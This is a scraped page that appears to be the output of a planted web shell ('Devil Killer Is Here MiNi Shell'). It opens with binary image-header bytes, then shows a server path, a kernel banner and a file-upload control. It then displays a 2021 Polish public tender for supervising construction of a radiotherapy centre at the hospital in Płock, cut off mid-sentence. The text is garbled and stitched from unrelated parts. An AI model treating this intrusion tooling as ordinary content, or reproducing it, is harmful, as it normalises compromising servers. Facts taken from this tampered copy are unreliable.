JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211126/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211126/0028667401-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Pełnienie kompleksowego nadzoru inwestorskiego nad robotami budowlanymi zadania pn.: &#34;Budowa i wyposażenie Ośrodka Radioterapii na terenie Wojewódzkiego Szpitala Zespolonego w Płocku&#34; </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">WOJEWÓDZKI SZPITAL ZESPOLONY W PŁOCKU</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000650070</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Medyczna 19</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Płock</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">09-400</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL923 - Płocki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">j.szelagowski@wszplock.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.wszplock.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samodzielny publiczny zakład opieki zdrowotnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Pełnienie kompleksowego nadzoru inwestorskiego nad robotami budowlanymi zadania pn.: &#34;Budowa i wyposażenie Ośrodka Radioterapii na terenie Wojewódzkiego Szpitala Zespolonego w Płocku&#34; </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-7867ba29-4eba-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00286674</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-11-26</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-7867ba29-4eba-11ec-8c2d-66c2f1230e9c <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W<br/>postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa<br/>się przy użyciu miniPortalu https://miniportal.uzp.gov.pl/, ePUAPuhttps://epuap.gov.pl/wps/portal oraz<br/>poczty elektronicznej - j.szelagowski@wszplock.pl. Wymagania techniczne i organizacyjne wysyłania i<br/>odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz<br/>informacji przekazywanych przy ich użyciu opisane zostały w<br/>Regulaminie korzystania z systemu miniPortalu dostępnym pod adresem<br/>https://miniportal.uzp.gov.pl/WarunkiUslugi.aspx oraz Regulaminie ePUAP. W postępowaniu<br/>wykonawca jest zobowiązany do opatrywania wskazanych<br/>dokumentów kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym.<br/>Szczegółowe informacje, dotyczące wymagań technicznych i organizacyjnych dot. korespondencji<br/>elektronicznej zostały opisane w SWZ oraz w rozporządzeniu Prezesa Rady Ministrów z dnia 30<br/>grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań<br/>technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego lub konkursie oraz rozporządzeniu Ministra<br/>Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych<br/>oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Zamawiający dopuszcza złożenie oferty w postaci katalogu</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z zapisami SWZ zawartymi w dziale XXIII.<br/>Informacje związane z RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">2910.18.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia są usługi w zakresie kompleksowego pełnienia nadzoru inwestorskiego nad zadaniem inwestycyjnym pn. &#34;Budowa i wyposażenie Ośrodka Radioterapii na terenie Wojewódzkiego Szpitala Zespolonego w Płocku&#34; w branży: budowlanej, sanitarnej i elektrycznej. Zakres robót oraz warunki ich realizacji określa dokumentacja postępowania przetargowego na wykonanie robót budowlanych zamieszczona na stronie internetowej: https://miniportal.uzp.gov.pl/Postepowania/8d12cb2f-e73f-43e8-9d9e-482262d5a6c1 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71520000-9 - Usługi nadzoru budowlanego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71248000-8 - Nadzór nad projektem i dokumentacją</p> <p class="mb-0">71530000-2 - Doradcze usługi budowlane</p> <p class="mb-0">71540000-5 - Usługi zarządzania budową</p> <p class="mb-0">71631000-0 - Usługi nadzoru technicznego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-10-28</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Oferta oceniana będzie pod względem:<br/>1.1. oceny, czy została złożona przez wykonawcę, który:<br/>a) nie podlega wykluczeniu,<br/>b) spełnia warunki udziału w postępowaniu, o ile zostały one określone przez zamawiającego,<br/>1.2. merytorycznym tj. wyboru najkorzystniejszej oferty zgodnie z podanymi kryteriami oraz oceny<br/>zgodności złożonej oferty z wymogami zamawiającego oraz pod względem przesłanek odrzucenia<br/>oferty określonych w art. 226 ustawy Pzp.<br/>2. Przed dokonaniem wyboru najkorzystniejszej oferty Zamawiający dokona w szczególności<br/>następujących czynności:<br/>2.1. zbada czy oferta została złożona w terminie składania ofert,<br/>2.2. zbada czy oferta została prawidłowo podpisana przez upoważnioną osobę, w tym wezwie do<br/>uzupełnienie pełnomocnictw w trybie art. 128 ust. 1 uPzp,<br/>2.3. zbada czy oferta została zabezpieczona wadium, jeśli jest ono wymagane,<br/>2.4. zbada czy wykonawcy odbyli ewentualna wizję lokalną,<br/>2.5. zbada ewentualne zastrzeżenie tajemnicy przedsiębiorstwa,<br/>2.6. zbada oświadczenie, o którym mowa w art. 125 ust 1 ustawy Pzp, w tym wezwie do jego<br/>uzupełnienia w trybie art. 128 ust. 1 uPzp lub jego wyjaśnienia w trybie art. 128 ust. 4 uPzp,<br/>2.7. dokona poprawienia omyłek pisarskich, rachunkowych i innych w ofercie, stosownie do treści art.<br/>223 uPzp,<br/>2.8. zbada czy nie występują przesłanki unieważnienia postępowania, o których mowa w art. 255 pkt. 3<br/>i 4 uPzp,<br/>2.9. zbada występowanie rażąco niskiej ceny, stosownie do treści art. 224 uPzp,<br/>2.10. zbada zgodność oferty z przedmiotem zamówienia i warunkami zamówienia w tym wezwie do<br/>wyjaśnień w trybie art. 223 ust. 1 uPzp i 107 ust. 4 uPzp, uzupełnień w trybie art.107 ust. 2 uPzp,<br/>2.11. dokona kwalifikacji podmiotowej wykonawcy w tym wezwie do złożenia podmiotowych środków<br/>dowodowych w trybie art. 126 ust. 1 uPzp i ewentualnie do ich uzupełnienia w trybie art. 128 ust1 uPzp<br/>lub ich wyjaśnienia w trybie art. 128 ust. 4 uPzp.<br/>2.12. dokona oceny pod kątem przesłanek odrzucenia oferty w trybie art. 226 uPzp.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Zadeklarowane dodatkowe pobyty nadzoru na budowie</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dodatkowe doświadczenie kluczowych osób skierowanych przez wykonawcę do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 6</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. Zdolności do występowania w obrocie gospodarczym.<br/>Określenie warunku:<br/>Zamawiający wymaga, aby wykonawcy prowadzący działalność gospodarczą lub zawodową byli wpisani do jednego z rejestrów zawodowych lub handlowych prowadzonych w kraju, w którym mają siedzibę lub miejsce zamieszkania.<br/><br/>2. Zdolność techniczna lub zawodowa<br/>Określenie warunku: <br/>1.	Warunek w rozumieniu Zamawiającego spełni Wykonawca, który wykaże, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, wykonał w minimum 2 usługi obejmujące nadzór inwestorski nad robotami budowlano – montażowymi o wartości min. 8.000.000,00 złotych brutto, polegających na budowie lub/i dobudowie lub/i przebudowie lub/i rozbudowie lub/i modernizacji obiektu budowlanego, przy czym w ramach nadzorowanych robót budowlanych musiały być wykonywane roboty w zakresie co najmniej: instalacji branży elektrycznej, instalacji branży sanitarnej, w tym instalacje wentylacji mechanicznej i klimatyzacji;<br/><br/>2.	Warunek w rozumieniu Zamawiającego spełni Wykonawca, który wykaże że, będzie dysponował osobami, które skierował do realizacji zamówienia publicznego, w szczególności odpowiedzialnymi za świadczenie usług, kontrolę jakości i nadzorowanie robót budowlanych, które posiadają kwalifikacje i uprawnienia zgodnie z wymogami ustawy Prawo budowlane (tekst jednolity: Dz.U. 2020 poz. 1333.ze zm.) do pełnienia samodzielnych funkcji technicznych w budownictwie oraz które posiadają doświadczenie opisane poniżej tj.:<br/>a)	Inspektor nadzoru w branży konstrukcyjno - budowlanej:<br/>a)1.	posiadający aktualne uprawnienia budowlane bez ograniczeń do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej;<br/>a)2.	wymagane - co najmniej 60 miesięczne doświadczenie przed upływem terminu składania ofert w pełnieniu funkcji inspektora nadzoru inwestorskiego lub kierownika robót lub kierownika budowy;<br/>b)	Inspektor nadzoru w branży sanitarnej:<br/>b)1.	posiadający aktualne uprawnienia budowlane bez ograniczeń do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji, urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych;<br/>b)2.	wymagane - co najmniej 60 miesięczne doświadczenie przed upływem terminu składania ofert w pełnieniu funkcji inspektora nadzoru inwestorskiego lub kierownika robót lub kierownika budowy;<br/>c)	inspektor w branży elektrycznej:<br/>c)1.	posiadający aktualne uprawnienia budowlane bez ograniczeń do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji, urządzeń elektrycznych i elektroenergetycznych;<br/>c)2.	wymagane - co najmniej 60 miesięczne doświadczenie przed upływem terminu składania ofert w pełnieniu funkcji inspektora nadzoru inwestorskiego lub kierownika robót lub kierownika budowy.<br/>UWAGA: <br/>•	Zamawiający dopuszcza możliwość łączenia wskazanych powyżej funkcji w przypadku, gdy ta sama osoba posiada wymagane uprawnienia / doświadczenie w więcej niż jednej specjalności; <br/>•	za uprawnienia budowlane odpowiadające wyżej określonym uznane zostaną uprawnienia, które wydane zostały na podstawie wcześniej obowiązujących przepisów oraz odpowiadające im uprawnienia wydane obywatelom państw członkowskich Unii Europejskiej, Konfederacji Szwajcarskiej lub państw członkowskich Europejskiego Porozumienia o Wolnym Handlu – EFTA (strony umowy o Europejskim Obszarze Gospodarczym), z zastrzeżeniem art. 12 a oraz innych przepisów ustawy Prawo Budowlane oraz ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2020 r. poz. 220 ze zm.);<br/>•	Wskazane powyżej doświadczenie w miesiącach należy liczyć od miesiąca uzyskania uprawnień budowlanych włącznie do miesiąca października 2021 włącznie.<br/>•	zwrot „bez ograniczeń” należy rozumieć zgodnie z przepisami Rozdziału 2. ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tekst jednolity Dz.U. z 2020 r., poz. 1333 ze zm.)<br/><br/><br/>3. Zamawiającemu przez Wykonawcę oświadczenia i dokumenty wymagane w SWZ w systemie<br/>„spełnia/nie spełnia”.<br/>4. Sposób spełnienia warunków udziału w postępowaniu w sytuacji, gdy Wykonawca w celu<br/>potwierdzenia ich spełniania polega na zdolnościach technicznych lub zawodowych podmiotów<br/>udostępniających zasoby.<br/>4.1 Wykonawca, który powołuje się na zasoby innych podmiotów, musi wykazać, że<br/>udostępnione zasoby pozwalają mu na wykazanie spełnienia warunków udziału w<br/>postępowaniu.<br/>4.2 W odniesieniu do warunku dotyczącego doświadczenia, wykonawca może polegać na<br/>zdolnościach podmiotów udostępniających zasoby, jeśli podmioty te wykonają usługi, do<br/>realizacji których te zdolności są wymagane.<br/>5. Sposób spełnienia warunków udziału w postępowaniu przez wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia.<br/>5.1. Warunek dotyczący zdolności do występowania w obrocie prawnym musi spełniać każdy<br/>wykonawca składający ofertę wspólną.<br/>5.2. Każdy z warunków określonych w pkt.2 poz. 2.2 winien spełniać co najmniej jeden z tych<br/>wykonawców albo wszyscy ci wykonawcy wspólnie.<br/>5.3. W odniesieniu do warunku dotyczącego doświadczenia, wykonawcy wspólnie ubiegający<br/>się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy<br/>wykonają usługi, do realizacji których te zdolności są wymagane.<br/>5.4. W przypadku, o którym mowa w ppkt 5.2 i 5.3 wykonawcy wspólnie ubiegający się o wykonają poszczególni wykonawcy. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art.<br/>125 ust. 1 uPzp (w oświadczeniu własnym), w zakresie podstaw wykluczenia z postępowania<br/>wskazanych przez zamawiającego w SWZ tj. art. 108 ust. 1, art. 109 ust. 1 pkt. 4-10 ustawy Pzp<br/>(przykładowy wzór – załącznik nr 7 do SWZ).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Wykonawca prowadzący działalność gospodarczą lub zawodową składa<br/>dokument potwierdzający, że jest wpisany do jednego z rejestrów zawodowych lub handlowych,<br/>prowadzonych w kraju, w którym ma siedzibę lub miejsce zamieszkania, w celu potwierdzenia<br/>spełniania przez wykonawcę warunków udziału w postępowaniu dotyczących zdolności do<br/>występowania w obrocie gospodarczym, wystawiony nie wcześniej niż 6 miesięcy przed jego<br/>złożeniem.<br/>2. Wykaz usług wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również<br/>wykonywanych, w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym<br/>okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi<br/>zostały wykonane lub są wykonywane, oraz załączeniem dowodów określających, czy te usługi zostały<br/>wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź<br/>inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku<br/>świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn<br/>niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; w<br/>przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne<br/>dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3<br/>miesięcy. Wykaz należy przygotować zgodnie ze wzorem określonym w załączniku nr 5 do swz.<br/>3) Wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w<br/>szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji<br/>zawodowych, uprawnień, doświadczenia niezbędnych do wykonania zamówienia publicznego, a także<br/>zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi<br/>osobami. Wykaz należy przygotować zgodnie ze wzorem określonym w załączniku nr 6 do swz.<br/>4) oświadczenie o którym mowa w art. 117 ust. 4 ustawy Pzp (jeśli dotyczy).<br/>5) zobowiązanie podmiotu udostępniającego zasoby o którym mowa w art. 118 ust. 3 ustawy Pzp (jeśli<br/>dotyczy).</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> nie dotyczy <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Dokumenty lub oświadczenia wymagane w przypadku wspólnego ubiegania się o zamówienie przez wykonawców (np. konsorcja , spółki cywilne) wymagane w załączeniu do oferty.<br/>1.1. potwierdzające spełnianie przez wykonawcę warunków udziału w postępowaniu oraz brak<br/>podstaw wykluczenia tych podmiotów.<br/>1.1.1. oświadczenie wskazane w art. 125 ust. 2 u Pzp (oświadczenie własne) składa każdy z<br/>wykonawców wspólnie ubiegających się o zamówienie.<br/>1.1.2. oświadczenie podmiotów wspólnie ubiegających się o udzielenie zamówienia zgodnie z<br/>postanowieniami art. 117 ust. 4 u Pzp.<br/>1.2. pełnomocnictwo do reprezentowania wykonawców wspólnie ubiegających się o zamówienie<br/>w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia<br/>umowy w sprawie zamówienia publicznego.<br/>2. Dokumenty potwierdzające spełnianie przez wykonawcę warunków udziału w 